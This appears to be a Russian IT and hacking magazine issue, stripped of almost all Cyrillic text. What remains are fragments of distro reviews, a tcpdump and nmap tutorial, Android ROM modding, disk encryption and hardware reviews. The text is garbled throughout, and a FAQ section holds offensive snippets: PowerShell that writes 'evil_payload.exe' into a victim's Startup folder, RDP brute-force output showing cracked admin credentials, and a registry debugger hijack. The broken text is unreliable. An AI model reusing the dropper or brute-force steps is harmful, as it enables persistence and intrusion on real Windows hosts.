Media Center, XBMC), CLS (Calculate Linux
Scratch) CSS (Calculate Scratch Server). , ,
. ,
Gentoo, IRC-
Gentoo Foundation. (Anthony G. Basile)
hardened/selinux-.
100 % Gentoo ( Gentoo)
, CL .
Calculate 2 ( ). , cl-install,
, , ,
.
,
.
,
,
Gparted c/fdisk. LVM
soft RAID /boot-.
IRC , . , .
RAM, , . ,
initramfs udev, ,
, Sabayon.
11.0 , ,
Sabayon,
, ,
( ). CL
equo,
emerge, , , vs .
,
( ).
REDHAT/FEDORA SLACKWARE
, Linux , RedHat/Fedora Slackware,
. ,
.
CentOS, , ,
, RedHat
.
Fedora
, ,
.
Fusion Linux (fusionlinux.org). Fuduntu
(fuduntu.org) Ubuntu, Fedora.
KDE Xange Linux (openxange.com) , .
RedHat (, CentOS)
Yellow Dog Linux (yellowdoglinux.com). ,
PowerPC PS3.
. VectorLinux (www.
vectorlinux.com), ;
Zenwalk (zenwalk.org), ; DeepStyle (deepstyle.org.ua) AgiliaLinux (
MOPSLinux, agilialinux.ru).
(/var/lib/layman/calculate/profiles/patches), , ,
.
: Grub .
- ,
. /var/calculate/linux cl-install.
Chromium OS , , .
( *) .
# eselect profile set 1
Gentoo. CL - , , USE- .
ebuild-
Calculate Linux
, 50 % ).
2.32. , KDE, XFce, Fluxbox . : DVD- (
, ), OEM- CD- ( ).
Windows .
( ), .
Zorin OS 5.1
: zorin-os.com
: GPL
: i386, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 2.6.38, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.2,
LibreOffice.Org 3.3.3.1
Linux Mint
UBUNTU
, Ubuntu, , . ,
.
: linuxmint.com
: GPL
: i386, x86_64
: Intel Pentium II, 512 M RAM, 4
Kernel 2.6.38-8, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.1,
LibreOffice.Org 3.3.2
Ubuntu, , , Linux. (
) Distrowatch.com,
. Clement Lefebvre.
,
.
( ).
Windows-.
,
Ubuntu, 100 %.
, ,
Ubuntu, .
. , . , ,
mintMenu, mintInstall
mintUpdate. mintInstall
: . , , ,
. Ubuntu Software Center,
, .
, -
(community.linuxmint.com/software). mintUpdate
: ,
, . Ubuntu, LTS-
.
LMDE, Debian
Gnome XFce Rolling
release. LMDE (201109).
GNOME (
, Ubuntu
, Windows.
( GnoMenu, , ,
) Win7. , .
Nautilus-Elementary
Gloobus Preview, Apple Quicklook.
, Software Center .
Zorin OS Look Changer
,
, Win7, WinXP Ubuntu.
Internet Browser Manager
- ( Chrome).
ZOS Wine
PlayOnLinux Winetricks, Windows. Ubuntu. , Core (
), Lite ( LXDE) Educational
. (Ultimate, Business,
Multimedia, Gaming) .
Ubuntu, LTS- (3.1).
Zorin OS Win7
Localization Manager (addlocale):
, , .
, . ,
PCLinuxOS Magazine,
(Karoshi, CAElinux, TinyMe ZEN-mini).
Mageia 1
: mageia.org/ru/
: GPL
: i586, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 3.0.4, Glibc 2.12.1, Udev 173, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.4, LibreOffice.Org 3.4.3
PCLinuxOS addlocale
MANDRIVA
, Mandriva
.
2003 Mandrake
( Mandriva). Radically Simple .
, Live-.
. 2007 PCLinuxOS Mandriva.
KDE-, (XFce, LXDE, OpenBox GNOME) . Full Monty Desktop DVD
, . Rolling
release, RPM-based.
PCLOS , 64- CPU.
CD-,
.
, LibreOffice
. URPM PCLinuxOS
,
APT Synaptic. ,
DrakX, : , .
, -
ZOS
WINE
PLAYONLINUX WINETRICKS
, , 2010.
Mandriva, . ,
Mandriva, ,
.
.
.
, , , , . ,
Mageia :
161 , 20 .
. -, 32- CD KDE GNOME. (Europa 2). DVD-
ISO, , 32-,
64- . .
Mageia Mandriva. Mageia Live ,
. ,
: .
, ,
. Mageia Control
Center, Mandriva CC. Rpmdrake.
Mandriva Mageia 1. ,
, mageia.org/en/1/migrate. z
Mageia Mandriva,
(execbit.ru)
TCPDUMP
UNIX-
.
,
tcpdump. ,
Linux
BSD- , ,
.
tcpdump , ,
.
,
.
tcpdump , .
25 ,
UNIX.
UNIX-
Windows libpcap, tcpdump.
, tcpdump,
,
.
tcpdump ,
TCP, UDP, ICMP, SMB/CIFS, NFS, AFS, AppleTalk. tcpdump
?
. :
Flags [.], seq 3666073194:3666074622, ack 3281095139,
win 2000, options [nop, nop, TS val 70228462 ecr 1681724],
length 1428
TCP-, tcpdump
( ):
DNS- tcpdump
DNS-
, tcpdump
. root ( , tcpdump
),
:
# tcpdump -i wlan0 -c 10 -n
, tcpdump, ,
DNS- tcpdump.
, DNS- ( 53) 192.168.0.101
192.168.0.1 . ?
16:22:41.340105 ( frac).
IP, , , :
: . , ,
. tcpdump
,
.
tcpdump DNS- 49244+ A? ya.ru. (23), ,
A?, ya.ru,
TCP/IP- 23
. .
,
, (8/2/3) (A
213.180.204.3, A 77.88.21.3, A 87.250.250.3...).
flags .
S (SYN), F (FIN), P (PUSH) R (RST),
.
data-seqno ,
first:last, first last
nbytes.
ack (ISN + 1).
window .
options ,
<mss 1024> ( ).
length .
,
.
, -X:
# tcpdump -i wlan0 -c 10 -n -X \
host 192.168.0.1 and port 80
, HTTP, .
, , .
,
'-v'. IP
IP-:
(tos 0x0, ttl 64, id 8339, offset 0, flags [DF],
proto UDP (17), length 51)
-, .
(TOS), (TTL),
,
, , (TCP,
UDP, ICMP) .
tcpdump, .
, host port,
, ,
, ?
src:
# tcpdump -i wlan0 -c 10 -n src 192.168.0.1
dst,
. , and:
# tcpdump -i wlan0 port not 22 and port not 53
GREP
TCPDUMP
tcpdump
,
.
ngrep,
, .
, , GET
POST HTTP-,
:
tcpdump:
-i [] , any.
-n IP- DNS-.
-nn IP- .
-X .
-XX Ethernet-.
-v, -vv, -vvv
(, , ).
-c [n] n .
-s [n] , ( ,
).
-S TCP-
(TCP sequence numbers).
-e Ethernet-.
-q ( ).
-E IPsec- .
SYN ( TCP-), :
# tcpdump 'tcp[13]==2'
:
# tcpdump -i wlan0 -c 10 -n > 32 and <= 128
? . TCP-
,
. SYN .
, . ,
:
:
# tcpdump 'tcp[tcpflags] & tcp-syn != 0'
# tcpdump -i wlan0 -c 10 -n src net 192.168.0.0/16 \
and dst net 10.0.0.0/8 or 172.16.0.0/16
tcpdump
.
: proto[expr:size], proto , expr
, size ,
( 1
). , -
tcpdump :
,
TCP/IP.
tcpdump,
.
1 , tcpdump
TCP- , nmap. , nmap 192.168.0.100
1. TCP-
2. SYN-
TCP- ,
SYN- (S ). 8888,
RST-. ,
.
587 . , nmap SYN-
22- (SSH) SYN-ACK:
, TCP-
, , ,
, . tcpdump
2.
TCP-, -
:
, nmap ,
RST-, .
: , ACK-,
. , , , .
:
, . , ,
, nmap, , .
:
SYN- (nmap -sS). -
, ,
SYN-ACK, ,
, . 3 UDP-. : nmap UDP-,
. ,
ICMP unreachable:
RTMP-
-, tv.adobe.com,
RTMP .
, tcpdump .
RTMP-, :
# tcpdump -eflAi eth0 -s 0 -w - | strings | \
grep -ao "rtmp://.\+.flv"
rtmpdump (lkcl.net/rtmp) flv- :
$ ./rtmpdump -r 'URL' -o .flv
.
null-, ,
(nmap -sN).
, . , Linux RST-:
192.168.0.100.39132 > 192.168.0.111.256: Flags [],
win 3072, length 0
192.168.0.111.256 > 192.168.0.100.39132: Flags [R.], ...
, . ACK-
3. UDP-
(-sA) tcpdump
ACK
RST. , ,
, nmap ,
. tcpdump
, , ICMP-
:
16:43:06.008305 IP 192.168.0.100
type-#68, length 1032
16:43:06.008383 IP 192.168.0.100
type-#34, length 1032
16:43:06.008714 IP 192.168.0.100
type-#183, length 1032
16:43:06.008831 IP 192.168.0.100
type-#192, length 1032
, ,
.
ICMP- . (, SYN)
.
tcpdump ,
,
.
, tcpdump
,
Wireshark:
$ ssh root@example.ru tcpdump -w - 'port !22' \
| wireshark -k -i -
google.com tcpdump
, ,
,
. ,
, Cisco Discovery Protocol,
Cisco :
# tcpdump -nn -v -i eth0 -s 1500 -c 1 \
'ether[20:2] == 0x2000'
,
DHCP (DISCOVER, REQUEST, INFORM),
:
grep,
, :
# tcpdump -nnvv -r dump.cap tcp | \
grep -v "tcp sum ok" | wc -l
, POP3-:
tcpdump , , .
,
. z
UNIXOID
(execbit.ru)
ID
O
R
D
N
A
Android
,
,
.
,
.
Linux,
Android ,
.
WWW
goo.gl/tlHRo
framework-res.apk.
goo.gl/fTvz8
Android.
goo.gl/Ya1fX
.
goo.gl/P6JR
IBM PC.
goo.gl/sGXwa
Android Honeycomb.
Android-:
1. , Google CyanogenMod.
2. .
3. ,
.
,
Android ,
.
, Android
, ,
.
( ) Android-,
.
,
,
. ,
, ,
.
.
xda-developers
, ,
ClockworkMod, ( , ,
,
][).
, , ,
. ,
, .
?
, ,
xda-developers.com.
, iOS, Windows
Mobile, Windows Phone Android. ,
Forums . Android
Development , [ROM]. -
Pure Android 2.3 Rom
CyanogenMod, , ,
(, , ). , , -
ROM .
.
unzip:
$ mkdir ~/rom; cd ~/rom
$ unzip ..///.zip
, , , , Android, ,
NAND- .
Android ,
,
/system/app
. ,
, . ,
, Android ( ADWLauncher
CyanogenMod) . K,
LauncherPro (www.launcherpro.com):
$ rm system/app/Launcher.apk
$ wget goo.gl/U9c54 -O system/app/LauncherPro.apk
. , ,
. , Android
.
.
(, prey),
. ,
Dialer One Phone.apk Go SMS
sms.apk.
Linux-, ssh mc? .
Android ARM NDK
Google,
. , mc .
xda-developers Midnight
Commander. apk- (goo.gl/Pax1H)
unzip:
$ cd /tmp; unzip ~/NativnuxInstaller_1.1.apk
assets/kits/mc-4.7.5.4arm.tar.jet. tar.gz,
apk- ( ,
apk, Install).
mc:
$ cd ~/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet
mc.
zip-
ClockworkMod Recovery. ,
(
~/rom) unzip.
SETPROP
build.prop
setprop:
# setprop debug.sf.nobootanimation 1
layout XML (
AXML, apktool XML).
,
, , .
xda-developers,
Android.
framework-res mod
_.
framework-res.apk, . , framework-res
diff:
$ diff -r ~/framework-res \
~/rom/system/framework/framework-res
,
framework-res,
4PDA: goo.gl/tlHRo.
framework-res.apk
apktool.
aapt Android SDK, apktool
apk-. :
$ cd ~/bin; wget goo.gl/tC7k8
,
Android .
Android, , .
Android framework/
framework-res.apk.
apktool:
$ cd ~; wget goo.gl/hxz5l
$ tar -xjf apktool1.4.1.tar.bz2
$ cd ~/rom/system/framework
$ java -jar ~/apktool.jar d framework-res.apk
framework-res, . res/drawable-* res/layout-*.
png-
. , drawableland-mdpi
,
(
). ,
.
$ cd ~/rom/system/framework
$ java -jar ~/apktool.jar b framework-res
$ cp framework-res/dist/framework-res.apk .
$ rm -rf framework-res
. png-, system/
media/bootanimation.zip. :
$ cd /tmp
$ mkdir bootanimation; cd bootanimation
,
ANDROID
FPS 24):
$ mplayer -nosound -vo png:z=9 video.avi
. xda-developers
,
.
.
, , . Android
system/build.prop,
.
,
Android, .
.
ClockworkMod Recovery: Android
$ unzip ~/rom/system/media/bootanimation.zip
desc.txt, :
FPS
p
...
1. :
ro.HOME_APP_ADJ=1
.
.
2. JPG-:
:
ro.media.enc.jpeg.quality=100
480 800 30
p 1 0 part0
p 0 0 part1
, .
3. :
debug.sf.nobootanimation=1
4. GPU:
debug.sf.hw=1
.
5. ( USB):
persist.adb.notify=0
wifi.supplicant_scan_interval=180
pm.sleep_mode=1
ro.ril.disable.power.collapse=0
3. 3G-:
ro.ril.hsxpa=2
ro.ril.gprsclass=10
ro.ril.hep=1
ro.ril.enable.dtm=1
ro.ril.hsdpa.category=10
ro.ril.enable.a53=1
ro.ril.enable.3g.prefix=1
ro.ril.htcmaskw1.bitmask=4294967295
ro.ril.htcmaskw1=14449
ro.ril.hsupa.category=5
4. :
framework-res.apk
net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960
system/
build.prop .
, , , . testsign.
zip:
$ cd ~/rom; zip -r my-rom.zip *
, Recovery
:
$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip
6.
:
ro.lge.proximity.delay=25
mot.proximity.delay=25
7. :
ro.mot.buttonlight.timeout=0
,
:
1. :
debug.performance.tuning=1
video.accelerate.hw=1
windowsmgr.max_events_per_sec=150
2. :
my-rom-signed.zip
.
Recovery,
( ).
Wipe data/factory reset,
( Recovery <Enter>), Yes
<Enter>.
Install zip from sdcard,
Choose zip from sdcard, my-rom-sign.zip SD-
Yes. Reboot
system now.
Android ,
.
, , ,
,
(/etc/init.d), .
. z
- Ubuntu 11.10
-
UBUNTU 11.10
Oneiric Ocelot ( ) 15- Linux- Canonical.
Unity. CD-,
DVD- ( 1,5 ),
(Inkscape, GIMP, Pitivi LibreOffice). ISO-
CD/DVD, USB Flash.
:
Linux kernel 3.0.1;
Unity 4.12.0
Compiz 0.9.6;
GNOME 3.2;
Mozilla Firefox 7.0.1, Mozilla
Thunderbird 7.0.1, LightDM,
Deja Dup, - Gwibber;
LibreOffice 3.4.2;
Python 3.2, GCC 4.6.1, Bash 4.2, CUPS 1.5.0,
Pidgin 2.10.0, UDEV 173, X.Org 1.10.4;
ARM- .
:
Ubuntu (Dash Home)
Launcher. Places,
,
Lenses,
(
, ,
, Google Docs) ,
.
.
<Alt+Tab>.
. ,
.
( ).
,
Launcher.
Unity
, . ,
,
, ,
.
Qt Unity 2D, OpenGL. Unity 2D
Qt
Qt Quick. Unity 2D
, Unity 3D,
ARM.
Ubuntu LoCo
(goo.gl/cC5kr, ubuntu-defaults-builder),
: ,
, ,
, ,
- Banshee
Rhythmbox .
cloud-
.
, .
.
Canonical 2013 .
Ubuntu 12.04,
2012 , LTS-,
.
SYN/ACK
aka 13oz
WWW
gscentr.ru
GSPD
.
,
,
-
.
.
,
( ),
. ,
, .
.
,
. -,
(-).
, . ,
: 687 781.
. ,
.
1)
, ,
, ,
( ) .
, :
, , .
2) ( ) ,
, ,
( ) , . ,
.
3) () , .
, ,
. . ,
,
58 .
, ,
, .
4) ,
- ,
. ,
, . , .
5) .
: / , , ,
( ) ,
. ?
,
.
6)
, ,
. :)
, :
, (/), ( , ,
),
,
(/) ( ).
.
7) , ,
. ,
, ,
. .
8) .
: ,
, , (
,
, - ),
.
9) , ,
, ,
.
10) , , ,
- .
? ,
,
.
11) , ,
, ,
.
, , 2 ( ), ,
, , , etc.
12)
,
, . ,
,
. :)
, ,
(
etc), ,
( ). ( ).
13) ,
.
, !
, ,
, .
14) , .
.
15) ,
,
,
.
, , , , ,
, .
16)
. ,
, . ? , .
- . ,
(
),
( ) .
.
17)
. ,
, , . ,
,
. , , ,
, ,
, .
18) ,
.
19) ,
?
. ,
, ( , ,
1 . ) - ,
. - ?
, , ,
- : ,
( ) . 90 .
, (
) .
20) , . , - .
,
.
, ,
. .
,
, . ,
,
. . :) ,
.
, ,
,
ISPDN.RU . ,
,
, , ,
.
,
,
- -.
, ( ,
,
),
. ,
. , ,
, , - ,
. z
?
:
1) , ,
, ,
.
2)
152-, .
3)
152- .
4)
,
,
. ,
, , ,
,
,
.
5)
:
. .
,
. . ,
, ,
.
. ,
,
, ,
,
, . .
.
,
, ,
, ,
.
.
6) ,
( ) (
)
( ).
7)
.
, ,
. ,
, ,
.
8) ,
(
,
,
, etc).
9)
152-.
10)
, , .
,
.
11)
,
, ,
,
.
.
FAQ
, ,
, ,
. ,
. ,
,
,
.
.
.
, .
,
, , , ,
. .
,
,
VLAN
.
.
.
,
?
,
,
,
. ,
,
- .
,
.
:
3;
2;
1.
, ( ),
2 -
.
,
.
.
,
. ,
.
,
?
,
?
,
.
.
:
,
, .
,
.
SYN/ACK
grinder (grinder@tux.in.ua)
WWW
LUKS code.
google.com/p/
cryptsetup
MySQL 5.6
Reference Manual
Encryption and
Compression - clck.
ru/P85I
Windows Azure SDK
microsoft.com/
windowsazure/sdk
vGate R2
securitycode.ru/
products/sn_vmware/vgate_com
Novell
Cloud Security Service novell.com/
products/cloudsecurity-service
FreeOTFE
freeotfe.org
INFO
. ,
PR, ,
,
.
,
.
.
.
. ,
(PaaS)
(SaaS) ,
.
,
. , (
). , . ,
, , ,
- .
, ,
, .
, , v-index.com, 38,9 %. ,
, . ,
.
,
,
,
.
,
SaaS (Software as a Service )
PaaS (Platform as a Service ),
, .
,
. : .
,
,
SaaS. , .
, ,
. ,
, Google Amazon,
,
v-index.com,
, -
.
- ,
. ;)
,
. ,
- .
, .
.
,
( )
, ,
, . ,
.
, DMZ ,
(VPN, /etc/host.allow).
DDoS-
.
. ,
, SaaS
. , . ,
.
,
, .
Security Code TrustAccess (securitycode.ru/
products/trustaccess) .
. ?
.
,
, , ,
. SaaS , ,
, ,
- VMware vCloud Director .
, ,
( ):
, .
,
. , ComputerWorld,
, ,
, VMware
vSphere. SaaS .
, .
, , SaaS
. , -
. -
. ,
,
( ).
,
,
- . ,
, VMware, vGate
R2 (securitycode.ru/products/sn_vmware/vgate_com).
,
(
VM), ,
, ( ACL ), VM, .
() ()
. ,
-.
(gnu.org/philosophy/who-does-that-server-really-serve.html)
, .
SaaS-
.
,
.
. ,
vGate
Novell Cloud Security Service (NCSS, novell.
com/products/cloud-security-service)
, .
NCSS :
( Active Directory). ,
SaaS/PaaS/IaaS, , NCSS
, .
, SaaS
,
. ,
, SaaS
.
,
.
, ,
, .
.
, ,
, .
SaaS . HTTPS, .
,
DM-CRYPT
dm-crypt ,
2.6+ CryptoAPI.
, ,
hibernate.
- Windows FreeOTFE,
Windows.
$ sudo apt-get install cryptsetup
:
$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K
/dev/mapper/:
$ sudo cryptsetup -y luksFormat /dev/sda5
$ sudo cryptsetup luksOpen /dev/sda5 encdisk
, .
$ sudo mkfs.msdos /dev/mapper/encdisk
$ sudo mount -t vfat -o rw /dev/mapper/encdisk /mnt/encdisk
:
$ sudo umount /mnt/encdisk
$ sudo cryptsetup luksClose /dev/mapper/encdisk
grinder (grinder@tux.in.ua)
.
, -
,
( Amazon EC2), , . 152
(clck.ru/P0dc)
. ,
. ,
. ,
, ,
, . -152
, , , , .
. ,
. . ,
( ),
. ,
, -
. PCI (Payment
Card Infrastructure),
, : .
, , , , , PCI, .
, . ,
- ? ,
.
.
LUKS (The Linux Unified Key Setup, code.google.com/p/cryptsetup),
Linux dm-crypt, . LUKS
TKS1 (Template
Key Setup 1), ,
,
. Windows
FreeOTFE (freeotfe.org),
Linux (cryptoloop, dm-crypt)
- HSM (Hardware Security Module, ) PKCS#11.
, Windows BitLocker ( EFS,
Encrypted File System).
. ,
,
. ,
, ,
. - ,
, . ,
MySQL Reference Manual . 11.13 Encryption
MySQL 15
Linux dm-crypt
.
,
, , .
. ,
,
Trend Micro SecureCloud,
FreeOTFE . ,
, ,
. . Amazon EC2, Eucalyptus
vCloud. SecureCloud ,
. , / .
FreeOTFE Linux
, , . ,
, ,
. , . ! . z
FERRUM
NAS
5- 6-
NAS-
.
,
( NAS)
. ,
!
. .
,
, . ,
. RAID. ,
RAID.
,
, .
,
? NAS. ,
100 ,
. NAS
, .
.
Intel NAS Performance Toolkit
. NAS , . , RAID0. RAID5 ,
.
, . ,
NAS.
.
NAS
D-LINK SHARECENTER
PRO 1200
D-Link
, Ethernet
USB. .
OLED- . ,
, .
, , . ,
, ,
.
D-Link ShareCenter Pro 1200 . ,
.
- D-Link
. , iSCSI. ,
- .
24 000
.
NETGEAR READYNAS
6 ULTRA
NETGEAR
. . . NETGEAR ReadyNAS
6 Ultra
2 . ,
12 , .
. RAID5.
FrontView. ,
.
.
, .
NETGEAR ReadyNAS 6 Ultra,
, , .
26 000
.
.
.
30 000
.
38 000
.
NETGEAR ReadyNAS
6 Ultra
NETGEAR
ReadyNAS 6
Ultra Plus
NAS
35 000
.
THECUS N5200XXX
Thecus N5200XXX.
. , NETGEAR: , , , .
: Intel Atom D525
1 DDR3 . ,
.
. , HDD.
OLED-, /
LAN- USB-.
Thecus N5200XXX , . , ,
, , ,
.
30 000
.
QNAP TS-559
Pro+
THECUS
N5200XXX
, ,
.
, NAS, 5-
6-. , ,
QNAP,
Synology Thecus. .
NETGEAR. NAS
( ), . z
FERRUM
SILICON POWER
SP060GBSSDV30S25
,
.
IOmeter,
SSD /
, .
IOmeter,
, . . PCMark Vantage,
HDD, ,
,
. , ATTO Disk
Benchmark /
0,5 8192 .
,
.
: SSD, 2,5
: SATA 3.0
: MLC
. : 550 /
. : 500 /
: 60
TRIM:
:
+
+
+
-
SSD, ,
,
.
SSD
.
Silicon Power
SP060GBSSDV30S25. -
60 , Windows 7
,
.
5400
.
:
IOmeter:
Random read 4 : 21,44 /
Random write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51,35 /
PCMark Vantage:
Test Suite: 26076
Windows Defender: 42,95 /
Gaming: 176,73 /
Importing pictures to Windows
Photo Gallery: 271,45 /
Windows Vista startup: 30,18 /
Video editing using Windows Movie
Maker: 88,42 /
Windows Media Center:
340,73 /
Adding music to Windows Media
Player: 151,54 /
Application loading: 167,14 /
, SandForce
SF-2000
MLC.
35 ,
.
Silicon Power SP060GBSSDV30S25 ,
SATA 3.0,
. ,
, ,
IOmeter,
.
Silicon Power SP060GBSSDV30S25
:
3,5- . SSD,
480 .
,
,
. Silicon
Power SP060GBSSDV30S25, !
. z
PHREAKING
Loop
,
INFO
Rx Tx
Receive
Transmit
( ).
Loop . ,
, ,
, .
-
, .
. ,
,
.
, , ,
. , ,
,
.
. ,
().
, . ,
, . ,
: ! : !.
- : ! :
! ! ? !
! ? , !
- .
,
,
. -
, . ,
, .
(broadcast storm).
,
- (. 1). -
... .
. loop_detection,
.
, .
Loop
1 TX+
-. . +
2 TX-
. . -
3 RX+
-. +
4 n/c
. ( )
5 n/c
-. ( )
. -
7 n/c
-. ( )
8 n/c
. ( )
1. RJ45
: (
) Ethernet ( Telnet
web-). .
Ethernet, IP-.
Web-
, , . . , web 80 HTTP- IP-.
. 1.
DLINK DES-3200
-,
.
1. IP-
:
DES-3200# config ipif System \
ipaddress xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.
3. web- IP- .
D-Link , RS-232, ,
. Out-of-Band.
,
.
(, HyperTerminal
Windows). :
Baud rate: 9,600
Data width: 8 bits
Parity: none
Stop bits: 1
Flow Control: none
. , Ctrl+r ,
.
.
,
Loopback-
Enter . , DES-3200#. .
, ,
, , .
? ,
.
, config,
:
RJ-45
DES-3200#config +
? Enter.
.
TAB.
. .
: Admin User.
Admin .
CLI:
DES-3200# create account admin/user <username>
( / )
: Enter a case-sensitive new password.
15
.
Success.
Admin:
Username "dlink":
DES-3200#create account admin dlink
Command: create account admin dlink
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
DES-3200#
: DES-3200# config
account <username>
dlink:
DES-3200#config account dlink
Command: config account dlink
Enter a old password:****
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
delete account
<username>.
. web- Telnet,
IP- ,
. IP- DHCP BOOTP
CLI:
DES-3200# config ipif System dhcp,
DES-3200# config ipif System ipaddress \
xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.
,
,
Loop
Command: save
Saving all settings to NV-RAM... 100%
done.
DES-3200#
.
reboot:
DES-3200#reboot
Command: reboot
! reset.
DES-3200#reset config
-, reset, .
loop_detection Alcatel
interface range ethernet e(1-24)
loopback-detection enable
exit
loopback-detection enable
loop_detection Dlink
enable loopdetect
config loopdetect recover_timer 1800
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap none
config loopdetect ports 1-24 state enabled
config loopdetect ports 25-26 state disabled
.
loopback .
. , , -
, UP-, , ,
. - .
:
, (Rx Tx).
,
2 6, 1 3.
, , -
-. . 3.
,
, link. !
!
, HELLO WORLD
Hello world? !
,
.
, ,
.
(. 4).
? ,
,
- -.
.
, .
. ?
. . ? !
Hello World Cshell:
LOOPBACK
oop ,
. ,
loopback-.
. loopback-.
, , ,
, .
:
./script.csh IP_ _.
,
. , , ,
,
!
, .
: ?
:
. ,
. , ,
, - .
!
loop_detection , .
, .
! z
(twtitter.com/stepah)
FAQ United
FAQ@REAL.XAKEP.RU
LINUX?
OpenSSL .
,
:
OpenSSL! -,
Linux-,
SSL-.
,
. ,
OpenSSL
, , ,
,
.
1. .
GnuPG (www.
gnupg.org),
OpenSSL:
, OpenSSL
,
bash-. , , ,
:
$ for f in * ; do [ -f "$f" ] && openssl \
aes-256-cbc -salt -in "$f" -out "$f.enc" \
-pass file:password.txt ; done
2. . OpenSSL
, SHA1-1 MD5-. SHA1
file-test-64:
$ openssl sha1 file-test-64
SHA1(eapol-64)= afc594f26ca0878073769d24f8c04fe35f2bf8b3
3. , SSL/TLS
,
OpenSSL.
:
, TLSv1/
SSLv3.
4. OpenSSL
speed test,
. :
$ openssl s_time -connect \
webserver.com:443
-
,
(FTP.EXE, . .)
.
,
debug.exe.
64
. , debug.exe
Microsoft.
, Windows 7 Server 2008 PowerShell, -
5 : DNS-
C&C-.
DNS- ,
IP-
.
?
,
, hosts?
BIND (www.isc.org).
DNS-
DNS-, BIND, , .
, ,
. DNS-.
ApateDNS (bit.ly/sZQiK1).
security- Mandiant.
DNS-
IP-, .
, , ApateDNS ( ),
DNS.
. ?
.
PowerShell:
ANDROID-,
ANDROID? GOOGLE,
!
Android,
Android SDK,
,
ARM
x86. -
. ,
,
Bluestacks
(bluestacks.com). , Android-,
.
.
hexdump.txt -
:
77 90
184 0
0 0 0
0 0 0
144
0 0
0 0
0 0
0 3
0 0
0 0
232
0
0
0
0
0
0
0
0
Android.
. ,
, .
,
, . ,
, .
Bluestacks 7 .
,
Android x86 (www.android-x86.org),
.
(http://bit.ly/rYs9OI),
!
0 4 0 0 0 255 255 0 0
64 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0
0 14 31 ....
,
. ( ,
),
(
).
PS-:
PS > [string]$hex = get-content -path C:\Users\victim\Desktop\hexdump.txt
PS > [Byte[]] $temp = $hex -split ' '
PS > [System.IO.File]::WriteAllBytes("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\evil_payload.exe", $temp)
,
.
,
.
FakeDNS (bit.ly/szUFXI).
Malcode
Analysis Pack. ApateDNS,
DNS,
IP-. ( ) HEX.
Android-x86, VirtualBox, ,
Nexus One!
fakedns.py (bit.ly/vhgamQ).
DNS Python ( 40 )
. IP ,
fakedns.py,
.
HostsMan (bit.ly/uZAV0X).
DNS-,
hosts. , ,
. , , 99%
. :)
Process Explorer
(bit.ly/ugFDpx) Replace
Task Manager,
. ,
:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
taskmgr.exe
, . Debugger (,
c:\utils\Process Explorer\procexp.exe).
,
-
WEBSOCKET?
. ,
:
1. ,
, Wireshark (www.wireshark.org).
,
WebSockets,
,
HTTP (, SOAP).
2. Firefox
Tamper Data (bit.ly/sM49Hk),
,
.
N . ,
.
: Low, Media
High. , -
,
Medium (
). ,
. Process
Explorer
(View Select
Columns Integrity Level).
? ,
- ,
usermode.
, , ,
KeePass ,
,
.
. - ,
KeePass
.
KeePass
High, . !
-
( KeePass)
Run as administrator. , ,
,
.
, .
Windows Integrity Levels .
icacls,
Chml (bit.ly/s0BLCm). ,
( "-i:h") ( "-nr"):
192.168.26.137:3389,CL=2
rdp://192.168.26.137:3389 (EID 1) Login
failed: 'administrator' 'admin'
...
Discovered credentials on
rdp://192.168.26.137:3389 'administrator' 'admin123'
!
.
NETSETMAN (WWW.NETSETMAN.COM)?
netsh
dump:
netsh interface dump > netsh-config1.txt
:
# ---------------------------------
# Interface IP Configuration
# ---------------------------------
pushd interface ip
# Interface IP Configuration for "Local Area Connection 1"
set address name="Local Area Connection 1" source=dhcp
set dns name="Local Area Connection 1" source=dhcp register=PRIMARY
set wins name="Local Area Connection 1" source=dhcp
popd
# End of interface IP configuration
...
, netsh -f:
Q WINDOWS
INTEGRITY LEVELS?
?
Windows Vista, 7
A Server 2008,
, mandatory integrity levels (MIL).
,
Microsoft
, ,
-
, .
.
,
N
, file.zip
Access is denied.
,
,
, ,
. z
RDP?
,
RDP-, TSGrinder (bit.ly/uThpnS).
.
ncrack (nmap.org/ncrack)
nmap ,
RDP. :
FakeDNS DNS-..
>System
AutoHideDesktopIcons 1.41
Device Remover 0.9
DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
HD Tune Pro 5.0
HDClone 4.0.7
JaBack 9.12
Nimi Visuals
OCCT Perestroika 4.0.0
Real Temp 3.60
Smart Defrag 2.2
Svchost Process Analyzer
System Explorer 3.6.2
WhoCrashed 3.02
X Mouse Button Control 2.0
>>UNIX
>Desktop
Cheese 3.2.2
Clementine 0.7.1
Coolreader 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnuplot 4.4.4
Handbrake 0.9.5
Imageagick 6.7.3-8
K9copy 2.3.7
>Net
Angry IP Scanner 3.0 Beta 6
ClipGrab 3.1.3.1
Freeproxy 4.10
IncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioClicker 8.11
>Security
Ariadne
BeEF 0.4.2.11
Buster Sandbox Analyzer 1.44
CIAT 1.02
ClamAV 0.97.3
DirBuster 0.12
